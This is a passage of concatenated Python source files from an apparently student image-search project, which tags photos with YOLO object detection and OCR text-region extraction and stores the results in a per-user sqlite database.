        self.Yolo_sub.writeDetectRet()
        ret = self.Yolo_sub.getObjList()
        if Launcher.DEBUG:
            print(f"RESULT : {ret}")
        for i in range(len(ret)):
            if Launcher.DEBUG:
                print(f'{self.getRelatedClasses(ret[i][1])}')
            logger.insertNonTextyPhoto(i, self.fileList[i], self.getRelatedClasses(ret[i][1]))

    def analyzeTextImages(self, logger, batch_size=8):
        """OCR every image one at a time and log the recognized text."""
        image_list = self.readImages()
        for i in range(0, len(image_list)):
            # logger.insertTextyPhoto(i, self.fileList[i], self.textAnalyzer.single_ocr(image_list[i], "none"))
            logger.insertTextyPhoto(i, self.fileList[i], self.textAnalyzer.findTextOnImage(image_list[i]))

    def analyzeTextImagesByBatch(self, logger, batch_size=8):
        """OCR the images in batches and log the recognized text."""
        image_list = self.readImages()
        for i in range(int(len(self.fileList) / batch_size) + 1):
            if i * batch_size == len(self.fileList):
                break
            elif (i + 1) * batch_size > len(self.fileList):
                ret = self.textAnalyzer.findTextOnImage(image_list[i * batch_size:], len(self.fileList) - (i * batch_size))
            else:
                ret = self.textAnalyzer.findTextOnImage(image_list[i * batch_size: (i + 1) * batch_size], batch_size)
            for j in range(len(ret)):
                order = i * batch_size + j
                # NOTE(review): passes four arguments — verify insertTextyPhoto
                # accepts a tag-list argument in this position.
                logger.insertTextyPhoto(order, self.fileList[order], [], ret[j])

    def classifyImages(self):
        """Non-batch path: return (index, path, related-classes, ocr-text) tuples."""
        # Not batch Operation
        image_list = self.readImages()
        tag_list = []
        for i in range(0, len(self.fileList)):
            tag_list.append((i, self.fileList[i], self.getRelatedClasses(self.objClassifier.detectObj_in_Image(image_list[i])), self.textAnalyzer.ocr([image_list[i]])))
            if Launcher.DEBUG:
                print(self.fileList[i],self.objClassifier.detectObj_in_Image(image_list[i]))
        return tag_list

    def getRelatedClasses(self, keywords):
        """Expand each detected keyword via the hierarchy tree; de-duplicated."""
        ret = []
        for key in keywords:
            try:
                ret += self.hierarchyTree.searchKeyword(key)
            except:
                # searchKeyword returns None for unknown keywords, making the
                # += raise; such keywords are simply skipped.
                continue
        ret = list(set(ret))
        return ret
if __name__ == "__main__":
    # Manual smoke test. Fixed: ImageClassifier.__init__ requires a logger
    # (the file list is filtered against the database), so construct one
    # here — the original called ImageClassifier('easy') with one argument
    # and crashed with a TypeError before doing any work.
    logger = Logger.Logger('easy')
    logger.createTable()
    IC = ImageClassifier('easy', logger)
    # result = IC.classifyImagesByBatch()
    result = IC.classifyImages()
    for dat in result:
        print(dat[2])
--- FILE SEPARATOR ---
import numpy as np
import cv2
import sys
import os
import Launcher
from FilePath import FilePathGetter
'''
ImageGetter
디렉토리 내의 이미지 경로들을 가져오는 클래스
'''
class ImageGetter:
    """Lists the image files inside a user's image directory."""

    # Accepted image extensions (checked case-insensitively).
    _IMAGE_EXTENSIONS = (".jpg", ".jpeg", ".png")

    def __init__(self, user_id):
        # Per-user subdirectory of the project image directory.
        self.path_dir = FilePathGetter.getImageDirPath() + "\\" + user_id

    def setDirPath(self, path):
        """Override the directory scanned by getFileList()."""
        self.path_dir = path

    def getDirPath(self):
        """Return the directory currently being scanned."""
        return self.path_dir

    def getFileList(self, logger):
        """Return paths of images in the directory that are not yet in the DB.

        Fixed: the original filter read ``".jpg" in file_name or ".png" or
        ".jpeg" in file_name in file_name`` — the bare truthy ``".png"`` made
        the condition always True, so every file (images or not) passed.
        """
        file_name_list = os.listdir(self.path_dir)
        path_list = [self.path_dir + '\\' + file_name
                     for file_name in file_name_list
                     if file_name.lower().endswith(self._IMAGE_EXTENSIONS)]
        path_list_in_db = [path[0] for path in logger.getAllPath()]
        new_paths = [path for path in path_list if path not in path_list_in_db]
        if Launcher.DEBUG:
            # Fixed: the original printed the generator object itself.
            print(new_paths)
        return new_paths
if __name__ == "__main__":
imageGetter = ImageGetter('yjm6560')
print(imageGetter.getDirPath())
print(imageGetter.getFileList())
--- FILE SEPARATOR ---
import ImageClassifier
import Logger
from FilePath import FilePathGetter
import threading
'''
Launcher
실행 파일
1. db 파일 생성
2. image classify
3. test
'''
#TODO : 지금은 한 번 돌고 끝내는 상황임. 무한으로 돌게 고쳐야됨
#TODO : 계층트리 적용
DEBUG = False  # module-wide debug flag read by the other modules (Launcher.DEBUG)

if __name__ == "__main__":
    user_1 = "yjm6560"
    user_2 = "admin"
    user = user_2
    # Create/open the per-user database table.
    logger = Logger.Logger(user)
    logger.createTable()
    # Build the classifier; its file list holds only images not yet logged.
    IC = ImageClassifier.ImageClassifier(user, logger)
    print(f"{len(IC.fileList)}")
    if len(IC.fileList) == 0:
        exit()
    # Run the external-yolo pass, the batch-yolo pass, and the OCR pass
    # concurrently; each thread writes its results through the shared logger.
    threads = []
    threads.append(threading.Thread(target=IC.classifyObjImages_sub, args=(logger, 8)))
    threads.append(threading.Thread(target=IC.classifyObjImagesByBatch, args=(logger, 8)))
    threads.append(threading.Thread(target=IC.analyzeTextImages, args=(logger, 8)))
    if DEBUG:
        print("THREAD START")
    for i in range(len(threads)):
        threads[i].start()
    for i in range(len(threads)):
        threads[i].join()
    if DEBUG:
        print("THREAD END")
    exit()
    # Everything below is dead manual-test code kept for experiments
    # (unreachable because of the exit() above).
    #classify images and insert into database
    ###TEST CODE###
    print("="*30)
    print("INSERTING IMAGES")
    print("="*30)
    # sample search inputs
    tag_data = ["pizza", "dog","cat","cell phone","pizza"]
    text_tag = [["shop"],["cat", "shop"],["cat"]]
    # search by tag
    print("="*30)
    print("TAG SEARCH")
    print("="*30)
    for tag in tag_data:
        print("SEARCH TAG : ", tag)
        ret = logger.getPhotoByTag([tag])
        for dat in ret:
            print("\t",dat[1])
    # search by recognized text
    print("=" * 30)
    print("TEXT SEARCH")
    print("=" * 30)
    for text in text_tag:
        print("SEARCH TEXT : ", text)
        ret = logger.getPhotoByText(text)
        for dat in ret:
            print("\t", dat[1])
--- FILE SEPARATOR ---
import sqlite3
import threading
from FilePath import FilePathGetter
'''
Logger
db 접근용 클래스
기능
1. 테이블 생성
2. 텍스트 포함 이미지 삽입
3. 텍스트 미포함 이미지 삽입
4. 태그로 이미지 검색
5. 텍스트로 이미지 검색
'''
#TODO : 텍스트 포함, 미포함으로 나눌지 말지 정해야 함.(현재는 나눠진 상태)
class Logger:
    """Thin per-user sqlite access layer for classified photo records.

    Table schema: (photo_id integer, path TEXT PRIMARY KEY, tag_list TEXT,
    text_img TEXT). Tags are stored as "/tag1/tag2/.../".
    """

    def __init__(self, user_id):
        # One database file per user. The hard-coded developer path is kept
        # as-is (changing it would move existing databases).
        # NOTE(review): self.db_name is interpolated into SQL as a table name
        # (table names cannot be bound parameters) — user_id must stay trusted.
        self.db_name = FilePathGetter.getDBName() + "_" + user_id
        self.conn = sqlite3.connect("C:\\Users\\yjm6560\\Desktop\\yjm6560\\CE\\graduation_project\\SearchPicture\\" + self.db_name + ".db", check_same_thread=False)
        self.cur = self.conn.cursor()
        self.lock = threading.Lock()

    def createTable(self):
        """Create this user's table if it does not exist yet."""
        create_query = "CREATE TABLE IF NOT EXISTS " + self.db_name + "(photo_id integer, path TEXT PRIMARY KEY , tag_list TEXT, text_img TEXT)"
        self.cur.execute(create_query)
        self.conn.commit()

    def getPhotoByTag(self, tag_keywords):
        """Return rows whose tag_list contains every "/keyword/" given.

        Fixed: keywords are now bound as parameters instead of being
        concatenated into the SQL string (LIKE-injection risk).
        """
        conditions = " AND ".join("tag_list LIKE ?" for _ in tag_keywords)
        select_query = "SELECT photo_id, path, tag_list FROM " + self.db_name + " WHERE " + conditions
        params = ["%/" + keyword + "/%" for keyword in tag_keywords]
        self.cur.execute(select_query, params)
        return self.cur.fetchall()

    def getPhotoByText(self, text_keywords):
        """Return rows whose text_img contains every keyword given (parameterized)."""
        conditions = " AND ".join("text_img LIKE ?" for _ in text_keywords)
        select_query = "SELECT photo_id, path, tag_list, text_img FROM " + self.db_name + " WHERE " + conditions
        params = ["%" + keyword + "%" for keyword in text_keywords]
        self.cur.execute(select_query, params)
        return self.cur.fetchall()

    def insertNonTextyPhoto(self, photo_id, photo_path, tag_list):
        """Insert a photo with its tags; if the path exists, merge the tags in.

        Fixed: the path is bound as a parameter in the duplicate-path branch,
        and the lock is released in a finally block so an unexpected error
        can no longer leave it held forever.
        """
        self.lock.acquire()
        try:
            insert_query = "INSERT INTO " + self.db_name + "(photo_id, path, tag_list) VALUES( ? , ? , ? )"
            try:
                self.cur.execute(insert_query, (photo_id, photo_path, "/" + "/".join(tag_list) + "/"))
            except sqlite3.IntegrityError:
                # Path already present: merge the stored tags with the new ones.
                select_query = f"SELECT tag_list FROM {self.db_name} WHERE path = ?"
                self.cur.execute(select_query, (photo_path,))
                obj_list = self.cur.fetchall()
                if obj_list and obj_list[0][0] != "":
                    print("OBJ LIST : ", obj_list)
                    tag_list = tag_list + obj_list[0][0].split("/")
                update_query = f"UPDATE {self.db_name} SET tag_list = ? WHERE path = ?"
                self.cur.execute(update_query, ("/" + "/".join(tag_list) + "/", photo_path))
        finally:
            self.lock.release()
        self.conn.commit()

    def insertTextyPhoto(self, photo_id, photo_path, text, text_img=None):
        """Insert a photo with its OCR text; on duplicate path, update the text.

        Backward-compatible fix: some callers pass (id, path, tag_list, text).
        When a fourth argument is given it is taken as the text and the third
        argument (the tag list) is ignored — previously those calls raised
        TypeError because the method was declared with three parameters.
        """
        if text_img is not None:
            text = text_img
        # TODO: adjacent glyphs are OCRed with spurious spaces; strip all
        # spaces/newlines for now (to be revisited).
        text = text.replace(" ", "").replace("\n", "")
        insert_query = "INSERT INTO " + self.db_name + " VALUES( ? , ? , ? , ?)"
        try:
            self.cur.execute(insert_query, (photo_id, photo_path, "", text))
        except sqlite3.IntegrityError:
            update_query = f"UPDATE {self.db_name} SET text_img = ? WHERE path = ?"
            self.cur.execute(update_query, (text, photo_path))
        self.conn.commit()

    def getAllPath(self):
        """Return every stored photo path as 1-tuples."""
        getPath_query = f"SELECT path FROM {self.db_name}"
        self.cur.execute(getPath_query)
        return self.cur.fetchall()
if __name__ == "__main__":
    # Manual test: rebuild the table and exercise inserts and searches.
    logger = Logger("yjm6560")
    logger.cur.execute("DROP TABLE IF EXISTS " + logger.db_name)
    logger.createTable()
    logger.insertNonTextyPhoto(1, "a", ["note", "book", "pencil"])
    logger.insertNonTextyPhoto(2, "b", ["news", "pen", "monitor"])
    logger.insertNonTextyPhoto(3, "c", ["news", "phone", "monitor"])
    logger.insertNonTextyPhoto(4, "d", ["mouse", "fly", "monitor"])
    # NOTE(review): these pass four arguments — verify insertTextyPhoto
    # accepts a tag-list argument in the third position.
    logger.insertTextyPhoto(5, "e", [], "Latte is horse")
    logger.insertTextyPhoto(6, "f", [], "I was a car")
    print(logger.getPhotoByText(["horse"]))
    print(logger.getPhotoByText(["car", "was"]))
    print(logger.getPhotoByTag(["monitor", "pen"]))
--- FILE SEPARATOR ---
import cv2
import argparse
import numpy as np
import Launcher
'''
Yolo
Object Detector
생성
yolov3.weights, yolov3.cfg, yolov3.txt 세 개의 경로를 인자로 넣어주면 됨
기능
1. 인자로 받은 이미지 classify
'''
#TODO : 1. OCR 적용 2. batch 적용
class Yolo:
    """OpenCV-DNN wrapper around a YOLO object detector.

    Construct with the paths of the .weights, .cfg and class-names files;
    detectObj_in_Image / detectObj_in_Images return the names of the
    detected classes (confidence > 0.5).
    """

    def __init__(self, weights, cfg, names):
        self.weights_file = weights
        self.config_file = cfg
        self.classes_file = names
        self.classes = []
        with open(self.classes_file, 'r') as f:
            self.classes = [line.strip() for line in f.readlines()]

    def get_output_layers(self, net):
        """Names of the network's unconnected (output) layers.

        Fixed: newer OpenCV versions return a flat int array from
        getUnconnectedOutLayers(), where indexing i[0] raised; flattening
        first handles both the old (N,1) and the new (N,) shapes.
        """
        layer_names = net.getLayerNames()
        out_idx = np.array(net.getUnconnectedOutLayers()).flatten()
        return [layer_names[int(i) - 1] for i in out_idx]

    def draw_prediction(self, img, class_id, confidence, x, y, x_plus_w, y_plus_h):
        """Draw a labeled bounding box for one detection onto *img* in place."""
        label = str(self.classes[class_id])
        COLORS = np.random.uniform(0, 255, size=(len(self.classes), 3))
        color = COLORS[class_id]
        cv2.rectangle(img, (x, y), (x_plus_w, y_plus_h), color, 2)
        cv2.putText(img, label, (x - 10, y - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)

    def detectObj_in_Image(self, image):
        """Detect object class names in a single image."""
        net = cv2.dnn.readNet(self.weights_file, self.config_file)
        return self.classifyOneImage(net, image)

    def detectObj_in_Images(self, images, batch_size=8):
        """Detect objects in a batch of images; returns a list of name lists."""
        net = cv2.dnn.readNetFromDarknet(self.config_file, self.weights_file)
        net.setPreferableBackend(cv2.dnn.DNN_BACKEND_OPENCV)
        net.setPreferableTarget(cv2.dnn.DNN_TARGET_CPU)
        if batch_size == 1:
            return [self.classifyOneImage(net, images)]
        else:
            return self.classifyImages(net, images, batch_size)

    def classifyImages(self, net, images, batch_size=8):
        """Batch forward pass; one de-duplicated class-name list per image."""
        result_list = []
        scale = 0.00392  # 1/255: normalize pixel values
        blob = cv2.dnn.blobFromImages(images, scale, (416, 416), (0, 0, 0), True, crop=False)
        net.setInput(blob)
        outs = net.forward(self.get_output_layers(net))
        for out in outs:
            for classified in out:
                class_list = []
                for detection in classified:
                    scores = detection[5:]
                    class_id = np.argmax(scores)
                    confidence = scores[class_id]
                    if confidence > 0.5:
                        if self.classes[class_id] not in class_list:
                            class_list.append(self.classes[class_id])
                result_list.append(class_list)
        return result_list[:batch_size]

    def classifyOneImage(self, net, image):
        """Single-image forward pass; returns a de-duplicated class-name list."""
        scale = 0.00392  # 1/255: normalize pixel values
        class_list = []
        blob = cv2.dnn.blobFromImage(image, scale, (416, 416), (0, 0, 0), True, crop=False)
        net.setInput(blob)
        outs = net.forward(self.get_output_layers(net))
        for out in outs:
            for detection in out:
                scores = detection[5:]
                class_id = np.argmax(scores)
                confidence = scores[class_id]
                if confidence > 0.5:
                    # Fixed: the original tested `class_id not in class_list`
                    # while appending *names*, so the de-dup never matched and
                    # a class could be reported many times (classifyImages
                    # already did this correctly).
                    if self.classes[class_id] not in class_list:
                        class_list.append(self.classes[class_id])
        return class_list

    def parser(self):
        """Build the CLI argument parser used when running this module directly."""
        ap = argparse.ArgumentParser()
        ap.add_argument('-i', '--image', required=True, help='path to input image')
        ap.add_argument('-c', '--config', required=True, help='path to yolo config file')
        ap.add_argument('-w', '--weights', required=True, help='path to yolo pre-trained weights')
        ap.add_argument('-cl', '--classes', required=True, help='path to text file containing class names')
        args = ap.parse_args()
        return args
if __name__ == "__main__":
    # Manual smoke test against a local sample image.
    yolo = Yolo('yolov3.weights', 'yolov3.cfg', 'yolov3.txt')
    # yolo = Yolo('yolo-obj_final.weights', 'yolo-obj.cfg', 'myObj.names')
    # yolo = Yolo('darknet\yolo9000\yolo9000.weights', 'darknet\yolo9000\yolo9000.cfg', 'darknet\yolo9000\9k.names')
    print(yolo.detectObj_in_Image(cv2.imread('cat.jpg')))
--- FILE SEPARATOR ---
#this code for testing(ROI)
import cv2
import numpy as numpy
from PIL import Image
import os
import copy
import pytesseract
# Experiment script: extract candidate text regions (ROIs) from every image in
# the current directory, draw the merged boxes, and save annotated copies.
# Several alternative merge algorithms are kept disabled as string literals.
pytesseract.pytesseract.tesseract_cmd = r'C:\\Program Files\\Tesseract-OCR\\tesseract'
files = os.listdir('./')
test_no = 25        # suffix for the output file names of this experiment run
new_width = 720     # all images are resized to this width
kernel1_size = 3    # morph-gradient kernel size
block_size = 15     # adaptive threshold block size
subtract = 3        # adaptive threshold subtraction constant
kernel2_size = 3    # morph-close kernel size
it = 1              # dilate/erode iterations
min_w = 40          # minimum box width kept
min_h = 10          # minimum box height kept
for f in files:
    print('*****' + f + ' start*****')
    #path = os.path.join(os.getcwd(), 'images', f)
    img = cv2.imread(f)
    image_name = f.split('.')[0]
    # resize to a fixed width, keeping the aspect ratio
    height, width, channel = img.shape
    new_height = int((height * new_width)/width)
    resizing_image = cv2.resize(img, dsize=(new_width, new_height), interpolation=cv2.INTER_AREA)
    # convert to grayscale
    gray_image = cv2.cvtColor(resizing_image, cv2.COLOR_BGR2GRAY)
    # morph gradient: emphasize edges
    kernel1 = cv2.getStructuringElement(cv2.MORPH_RECT, (kernel1_size, kernel1_size))
    morph_image = cv2.morphologyEx(gray_image, cv2.MORPH_GRADIENT, kernel1)
    # adaptive gaussian threshold: binarize, suppressing noise
    adaptive_gaussian_image = cv2.adaptiveThreshold(morph_image, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, block_size, subtract)
    # morph close (dilate then erode): join nearby strokes
    kernel2 = cv2.getStructuringElement(cv2.MORPH_RECT, (kernel2_size, kernel2_size))
    dilation = cv2.dilate(adaptive_gaussian_image, kernel2, iterations=it)
    erosion = cv2.erode(dilation, kernel2, iterations=it)
    # find contours on the cleaned binary image
    contours, b = cv2.findContours(erosion, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)
    # filter contour bounding boxes: drop duplicates, near-full-frame boxes,
    # and boxes smaller than min_w x min_h
    rect_list = []
    new_rect = []
    rrect = []
    for contour in contours:
        x,y,w,h = cv2.boundingRect(contour)
        r = [x,y,w,h]
        if r not in rrect:
            '''
            if abs(w-new_width) < 10 and abs(h-new_height) < 10:
                print('continue')
                print(str(x) + ' ' + str(y) + str(w) + str(h))
                print(str(new_width) + ' ' + str(new_height))
                #21번에서 수정
                continue
            '''
            if (x==0 and y==0) or abs(w-new_width) <= 5 or abs(h-new_height) <= 5:
                continue
            if w >= min_w and h >= min_h:
                rect_list.append([x,y,w,h])
                new_rect.append([x,y,w,h])
                rrect.append([x,y,w,h])
    '''
    #1번 알고리즘
    for r1 in rect_list:
        x1,y1,w1,h1 = r1
        for r2 in new_rect:
            x2,y2,w2,h2 = r2
            if ((x2-x1)>0 and (x2-x1)<=20) or ((y2-y1)>0 and (y2-y1)<=20):
                if w1<w2 and h1<h2:
                    print(r1)
                    if r1 in rrect:
                        rrect.remove(r1)
                        print('remove')
    '''
    # algorithm 2: drop boxes fully contained inside another box
    for r1 in rect_list:
        x1,y1,w1,h1 = r1
        for r2 in new_rect:
            x2,y2,w2,h2 = r2
            if (x1>x2 and y1>y2) and (((x1+w1)<(x2+w2)) and ((y1+h1)<(y2+h2))):
                if r1 in rrect:
                    rrect.remove(r1)
    '''
    #5번알고리즘
    for r1 in rect_list:
        x1,y1,w1,h1 = r1
        for r2 in new_rect:
            x2,y2,w2,h2 = r2
            if (abs(x1-x2) < 10 and (abs(y1-y2) < 10 or abs(y1+h1 - (y2+h2)) < 10)) or (abs(x1+w1-(x2+w2))<10 and (abs(y1-y2)<10 or abs(y1+h1 - (y2+h2))<10)):
                if r1 in rrect:
                    rrect.remove(r1)
    '''
    # algorithm 4: merge horizontally adjacent boxes (repeat until stable)
    rrects1 = copy.deepcopy(rrect)
    rrects2 = copy.deepcopy(rrect)
    merge = copy.deepcopy(rrect)
    end = False
    while not end:
        end = True
        for rect1 in rrects1:
            x1,y1,w1,h1 = rect1
            for rect2 in rrects2:
                x2,y2,w2,h2 = rect2
                if abs((x1 + w1) - x2) < 10 and abs(y1- y2) < 10 and abs(h1 - h2) < 10:
                    new_x = x1
                    new_y = min([y1,y2])
                    new_w = x2 + w2 - x1
                    new_h = max([y1+h1, y2+h2]) - new_y
                    merge.remove(rect1)
                    merge.remove(rect2)
                    merge.append([new_x,new_y,new_w,new_h])
                    # restart the scan over the updated box set
                    rrects1 = copy.deepcopy(merge)
                    rrects2 = copy.deepcopy(merge)
                    end = False
                    break
            if not end:
                break
    # algorithm 3: merge vertically adjacent boxes (repeat until stable)
    rects1 = copy.deepcopy(merge)
    rects2 = copy.deepcopy(merge)
    final = copy.deepcopy(merge)
    end = False
    while not end:
        end = True
        for rect1 in rects1:
            x1,y1,w1,h1 = rect1
            for rect2 in rects2:
                x2,y2,w2,h2 = rect2
                if abs((y1+h1) - y2) < 10 and abs(x1 - x2) < 10:
                    new_x = min([x1,x2])
                    new_y = y1
                    new_w = max([x1+w1, x2+w2]) - new_x
                    new_h = y2 + h2 - y1
                    final.remove(rect1)
                    final.remove(rect2)
                    final.append([new_x, new_y, new_w, new_h])
                    # restart the scan over the updated box set
                    rects1 = copy.deepcopy(final)
                    rects2 = copy.deepcopy(final)
                    end = False
                    break
            if not end:
                break
    '''
    for rect1 in rects1:
        x1,y1,w1,h1 = rect1
        for rect2 in rects2:
            x2,y2,w2,h2 = rect2
            if abs((y1+h1) - y2) < 10 and abs(x1 - x2) < 10:
                if rect1 in final:
                    final.remove(rect1)
                if rect2 in final:
                    final.remove(rect2)
                new_h = y2 + h2 - y1
                new_w = max([x1+w1, x2+w2]) - x1
                final.append([x1,y1,new_w,new_h])
    '''
    '''
    #6번 알고리즘
    final1 = copy.deepcopy(final)
    final2 = copy.deepcopy(final)
    for r1 in final1:
        x1,y1,w1,h1 = r1
        for r2 in final2:
            x2,y2,w2,h2 = r2
            if w1<w2 and h1<h2:
                if abs(x1-x2) <= 10:
                    if abs(y1-y2) <= 10 or abs((y1+h1)-(y2-h2)) <= 10:
                        if r1 in final:
                            final.remove(r1)
                elif abs((x1+w1)-(x2+w2)) < 10:
                    if abs(y1-y2) <= 10 or abs((y1+h1)-(y2-h2)) <= 10:
                        if r1 in final:
                            final.remove(r1)
    '''
    '''
    #2번 알고리즘
    final1 = copy.deepcopy(final)
    final2 = copy.deepcopy(final)
    for r1 in final1:
        x1,y1,w1,h1 = r1
        for r2 in final2:
            x2,y2,w2,h2 = r2
            if (x1>x2 and y1>y2) and (((x1+w1)<(x2+w2)) and ((y1+h1)<(y2+h2))):
                if r1 in final:
                    final.remove(r1)
    '''
    # crop each final box out of the resized image and draw it for inspection
    imagelist = []
    ori_image = Image.fromarray(resizing_image, mode='RGB')
    for rect in final:
        x,y,w,h = rect
        a = cv2.rectangle(resizing_image, (x,y), (x+w,y+h), (0,255,0), 2)
        area = (x,y,x+w,y+h)
        cropped_image = ori_image.crop(area)
        imagelist.append(cropped_image)
    '''
    #tesseract
    result = ''
    i = 0
    for img in imagelist:
        i = i + 1
        string = pytesseract.image_to_string(img, lang='kor')
        result = '#' + str(i) + ' ' + result + string + '\n'
        print(result)
    '''
    '''
    for contour in contours:
        x,y,w,h = cv2.boundingRect(contour)
        if w >= min_w and h >= min_h:
            a = cv2.rectangle(resizing_image, (x,y), (x+w,y+h), (0,255,0), 2)
    '''
    # save the annotated image next to the source, tagged with the run number
    Image.fromarray(resizing_image, mode='RGB').save(image_name + '_' + str(test_no) + '.jpg')
    print('*****' + f + ' end*****')
--- FILE SEPARATOR ---
#detect text region in image by OpenCV
import cv2
import numpy as np
from PIL import Image
import os
import copy
'''
*Text Region 추출 과정
1. color image를 grayscale 이미지로 변환
2. Adpative Threshold를 적용해서 잡영 제거
3. Morph close로 경계 강화
4. Long line Remove로 글씨 추출에 방해가 되는 요소 제거
5. find contours로 텍스트 영역 찾기
TODO
*조정이 필요한 parameter들
adaptiveThreshold() : block_size, subtract_val
morphClose() : widht, height, iter
*일정 크기 이하의 박스를 버릴지 냅둘지도 정해야됨
*findcontour함수에 rectangle 친걸 잘라서 넘길지 어떻게 할지..
'''
class FindTextRegion:
    """Detects candidate text regions in an image with OpenCV.

    Pipeline: resize -> grayscale -> morph gradient -> adaptive gaussian
    threshold -> morph close -> find/merge contours; findTextRegion() runs
    the whole pipeline and returns the cropped region images (PIL).
    """

    def __init__(self):
        # Every input is resized to this width before processing.
        self.new_width = 720

    def setImage(self, img):
        """Set the image (cv2/ndarray, BGR) to be processed."""
        self.original_image = img

    def changeImageSize(self):
        """Resize to self.new_width, preserving aspect ratio.

        INTER_AREA when shrinking, INTER_CUBIC when enlarging.
        """
        height, width, channel = self.original_image.shape
        self.new_height = int((height * self.new_width) / width)
        if width >= self.new_width:
            self.resizing_image = cv2.resize(self.original_image, dsize=(self.new_width, self.new_height), interpolation=cv2.INTER_AREA)
        else:
            self.resizing_image = cv2.resize(self.original_image, dsize=(self.new_width, self.new_height), interpolation=cv2.INTER_CUBIC)

    def imageConverting(self):
        """Return the resized image converted to grayscale."""
        gray_image = cv2.cvtColor(self.resizing_image, cv2.COLOR_BGR2GRAY)
        return gray_image

    def morphGradient(self, gray_image, width=3, height=3):
        """Morphological gradient with a (width x height) rectangular kernel."""
        kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (width, height))
        morph_image = cv2.morphologyEx(gray_image, cv2.MORPH_GRADIENT, kernel)
        return morph_image

    def adaptiveThreshold(self, morph_image, block_size = 15, subtract_val = 3):
        # block_size: size of the block used to compute each pixel's threshold
        #             (the pixel is the block center, so it must be odd)
        # subtract_val: constant subtracted from the computed mean
        adaptive_gaussian_image = cv2.adaptiveThreshold(morph_image, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, block_size, subtract_val)
        return adaptive_gaussian_image

    def morphClose(self, adaptive_gaussian_image, width = 3, height = 3, it = 1):
        # width/height give the kernel size; the kernel window sweeps the
        # image, updating the covered pixels.
        kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (width, height))
        # Two equivalent options: 1. cv2.morphologyEx(..., MORPH_CLOSE)
        # or 2. cv2.dilate() followed by cv2.erode().
        # Option 1:
        #self.closing_image = cv2.morphologyEx(adaptive_gaussian_image, cv2.MORPH_CLOSE, kernel)
        # Option 2:
        dilation = cv2.dilate(adaptive_gaussian_image, kernel, iterations=it)
        erosion = cv2.erode(dilation, kernel, iterations=it)
        return erosion

    def longLineRemove(self, closing_image, threshold = 100, min_line_length = 80, max_line_gap = 5):
        # min_line_length: minimum length for a segment to count as a line
        # max_line_gap: gaps larger than this split segments into separate lines
        lines = cv2.HoughLinesP(closing_image, 1, np.pi/180, threshold, min_line_length, max_line_gap)
        for line in lines:
            x1, y1, x2, y2 = line[0]
            cv2.line(closing_image, (x1, y1), (x2, y2), (0,255,0), 2)
        return closing_image

    def findContours(self, image):
        """Find, filter and merge contour boxes; return the cropped PIL images.

        Filtering drops duplicates, near-full-frame boxes and boxes smaller
        than min_w x min_h; contained boxes are removed, then horizontally
        and vertically adjacent boxes are merged until stable.
        """
        contours, b = cv2.findContours(image, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)
        min_w = 40
        min_h = 10
        rect = []
        for contour in contours:
            x,y,w,h = cv2.boundingRect(contour)
            r = [x,y,w,h]
            if r not in rect:
                if (x==0 and y==0) or abs(w-self.new_width)<=5 or abs(h-self.new_height)<=5:
                    continue
                if w >= min_w and h >= min_h:
                    rect.append(r)
        rect1 = copy.deepcopy(rect)
        rect2 = copy.deepcopy(rect)
        # drop boxes fully contained inside another box
        for r1 in rect1:
            x1,y1,w1,h1 = r1
            for r2 in rect2:
                x2,y2,w2,h2 = r2
                if (x1>x2 and y1>y2) and (((x1+w1)<(x2+w2)) and ((y1+h1)<(y2+h2))):
                    if r1 in rect:
                        rect.remove(r1)
        # merge horizontally adjacent boxes (restart scan after each merge)
        rect1 = copy.deepcopy(rect)
        rect2 = copy.deepcopy(rect)
        end = False
        while not end:
            end = True
            for r1 in rect1:
                x1,y1,w1,h1 = r1
                for r2 in rect2:
                    x2,y2,w2,h2 = r2
                    if abs((x1 + w1) - x2) < 10 and abs(y1- y2) < 10 and abs(h1 - h2) < 10:
                        new_x = x1
                        new_y = min([y1,y2])
                        new_w = x2 + w2 - x1
                        new_h = max([y1+h1, y2+h2]) - new_y
                        rect.remove(r1)
                        rect.remove(r2)
                        rect.append([new_x,new_y,new_w, new_h])
                        rect1 = copy.deepcopy(rect)
                        rect2 = copy.deepcopy(rect)
                        end = False
                        break
                if not end:
                    break
        # merge vertically adjacent boxes (restart scan after each merge)
        rect1 = copy.deepcopy(rect)
        rect2 = copy.deepcopy(rect)
        end = False
        while not end:
            end = True
            for r1 in rect1:
                x1,y1,w1,h1 = r1
                for r2 in rect2:
                    x2,y2,w2,h2 = r2
                    if abs((y1+h1) - y2) < 10 and abs(x1 - x2) < 10:
                        new_x = min([x1,x2])
                        new_y = y1
                        new_w = max([x1+w1, x2+w2]) - new_x
                        new_h = y2 + h2 - y1
                        rect.remove(r1)
                        rect.remove(r2)
                        rect.append([new_x,new_y,new_w,new_h])
                        rect1 = copy.deepcopy(rect)
                        rect2 = copy.deepcopy(rect)
                        end = False
                        break
                if not end:
                    break
        # crop each surviving box out of the resized image
        imagelist = []
        ori_image = Image.fromarray(self.resizing_image)
        for contour in rect:
            x,y,w,h = contour
            area = (x,y,x+w,y+h)
            croppend_image = ori_image.crop(area)
            imagelist.append(croppend_image)
            a = cv2.rectangle(self.resizing_image, (x,y), (x+w,y+h), (0,255,0), 2)
        # debug artifact: saves the annotated frame to the working directory
        Image.fromarray(self.resizing_image, mode='RGB').save('x.jpg')
        '''
        for contour in contours:
            x,y,w,h = cv2.boundingRect(contour)
            #r = cv2.rectangle(self.resizing_image, (x,y), (x+w, y+h), (0,255,0), 2)
            area = (x, y, x + w, y + h)
            cropped_img = ori_image.crop(area)
            imagelist.append(cropped_img)
            #cropped_img.show()
        '''
        return imagelist

    def findTextRegion(self, g_width, g_height, block_size, subtract_val, c_width, c_height, c_iter):
        """Run the whole pipeline with the given parameters; return region crops."""
        # change image size -> grayscale -> morph gradient ->
        # adaptive gaussian threshold -> morph close -> find contours
        self.changeImageSize()
        gray_image = self.imageConverting()
        morph_image = self.morphGradient(gray_image, g_width, g_height)
        adaptive_gaussian_image = self.adaptiveThreshold(morph_image, block_size, subtract_val)
        closing_image = self.morphClose(adaptive_gaussian_image, c_width, c_height, c_iter)
        # longLineRemove is deliberately not applied here
        imagelist = self.findContours(closing_image)
        return imagelist
#usage example
'''
if __name__ == '__main__':
path = os.path.join('1.jpg')
img = cv2.imread(path)
